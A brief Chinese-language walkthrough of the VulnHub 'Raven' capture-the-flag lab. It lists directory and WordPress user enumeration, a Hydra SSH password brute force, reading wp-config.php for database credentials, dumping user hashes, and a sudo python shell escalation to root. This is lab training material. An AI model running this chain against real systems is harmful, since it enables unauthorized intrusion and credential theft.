vulnhub-raven

靶机下载：https://download.vulnhub.com/raven/Raven.ova

kali：nat模式，靶机也nat模式

探测主机

扫描端口

访问网站，查看源代码，看到service.html访问看到flag1

dirb http://192.168.11.128看到wordpress

wpscan --url http://192.168.11.128/wordpress -e u

hydra -l michael -P rockyou.txt 192.168.11.128 ssh

ssh michael@192.168.11.128

cd /var/www/html/wordpress/
ls

cat wp-config.php

mysql -u root -p

show databases;
use wordpress;
show tables;

select * from wp_users;MD5解码

exit
su steven

sudo python -c 'import pty;pty.spawn("/bin/bash")
whoami

cd …/…/
cat flag2.txt